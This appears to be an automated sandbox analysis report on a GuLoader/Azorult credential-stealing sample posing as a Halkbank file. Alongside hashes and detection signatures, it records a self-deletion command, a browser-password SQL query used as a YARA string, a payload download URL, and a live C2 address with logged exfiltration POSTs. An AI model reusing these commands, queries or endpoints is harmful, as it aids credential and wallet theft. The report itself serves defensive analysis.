
Windows Analysis Report Halkbank02.exe

Overview

General Information

Sample Name: Halkbank02.exe
Analysis ID: 483639
MD5: a4cb6740c9195c5579acef4f7c8e40c7
SHA1: 54abe0f828d828d5ff840b989fb5f010395961f6
SHA256: f1b1abf0182c865a3521d659cbc4bd86a4b00b0e4be95468a1d3b5ff46a3efc8
Tags: exe, geo, GuLoader, Halkbank, TUR

Detection

Detected families: GuLoader, Azorult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Halkbank02.exe (PID: 5488 cmdline: 'C:\Users\user\Desktop\Halkbank02.exe' MD5: A4CB6740C9195C5579ACEF4F7C8E40C7)
    • Halkbank02.exe (PID: 5680 cmdline: 'C:\Users\user\Desktop\Halkbank02.exe' MD5: A4CB6740C9195C5579ACEF4F7C8E40C7)
      • cmd.exe (PID: 2920 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6500 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1l"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000001C.00000002.900879617.000000001F410000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Unpacked PEs

Source | Rule | Description | Author
28.2.Halkbank02.exe.1fcb3556.3.raw.unpack | OlympicDestroyer_1 | OlympicDestroyer Payload | kevoreilly
  • 0x41cd65:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x41d952:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x28deb0:$string2: API call with %s database connection pointer
  • 0x28eae4:$string3: os_win.c:%d: (%lu) %s(%s) - %s
28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack | OlympicDestroyer_1 | OlympicDestroyer Payload | kevoreilly
  • 0x41876c:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x419359:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x2898b7:$string2: API call with %s database connection pointer
  • 0x28a4eb:$string3: os_win.c:%d: (%lu) %s(%s) - %s
28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack | OlympicDestroyer_1 | OlympicDestroyer Payload | kevoreilly
  • 0x413dfc:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x4149e9:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x284f47:$string2: API call with %s database connection pointer
  • 0x285b7b:$string3: os_win.c:%d: (%lu) %s(%s) - %s

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1l"}
Multi AV Scanner detection for submitted file
Source: Halkbank02.exe | ReversingLabs: Detection: 13%
Source: Halkbank02.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49822 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49825 version: TLS 1.2
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.28.dr
      Source: Binary string: ucrtbase.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-memory-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874674316.00000000200D4000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-synch-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.869027129.000000001F838000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000002.901129963.000000001F860000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876256297.000000001F478000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: msvcp140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-profile-l1-1-0.dll.28.dr
      Source: Binary string: ucrtbase.pdbUGP source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.870977200.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processenvironment-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.868789686.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.869710011.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-1.dll.28.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-namedpipe-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876736098.000000001F4B0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-string-l1-1-0.dll.28.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.871542123.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.28.dr
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_00401500
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00401500
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_00402872
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402872
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402C7A
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402E7C
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_00402A0C
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402A0C
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402C3F
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_004028F7
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_004028F7
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_00402A81
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402A81
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_004020A7
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_004020A7
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402B02
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402D07
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402F0C
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_004027DC
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_004027DC
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402DF6
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402B84
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 4x nop then mov ebx, ebx | 1_2_0040298D
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_0040298D
Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 5x nop then xor eax, 4C849A4Bh | 1_2_00402F9E

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1l
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 31.210.20.16
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-0g-c0-docs.googleusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /panel1/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 31.210.20.16 | Content-Length: 109 | Cache-Control: no-cache | Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38 | Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
Source: global traffic | HTTP traffic detected: POST /panel1/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 31.210.20.16 | Content-Length: 80859 | Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
Source: Halkbank02.exe, 0000001C.00000002.899718241.000000001E420000.00000004.00000001.sdmp | String found in binary or memory: http://31.210.20.16/panel1/index.php
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.28.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: http://www.mozilla.com0
Source: Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: 204641256101765428455219.tmp.28.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | HTTP traffic detected: POST /panel1/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 31.210.20.16 | Content-Length: 109 | Cache-Control: no-cache | Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38 | Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
Source: unknown | DNS traffic detected: queries for: drive.google.com

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Malicious sample detected (through community Yara rule)
Source: 28.2.Halkbank02.exe.1fcb3556.3.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: Halkbank02.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 28.2.Halkbank02.exe.1fcb3556.3.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
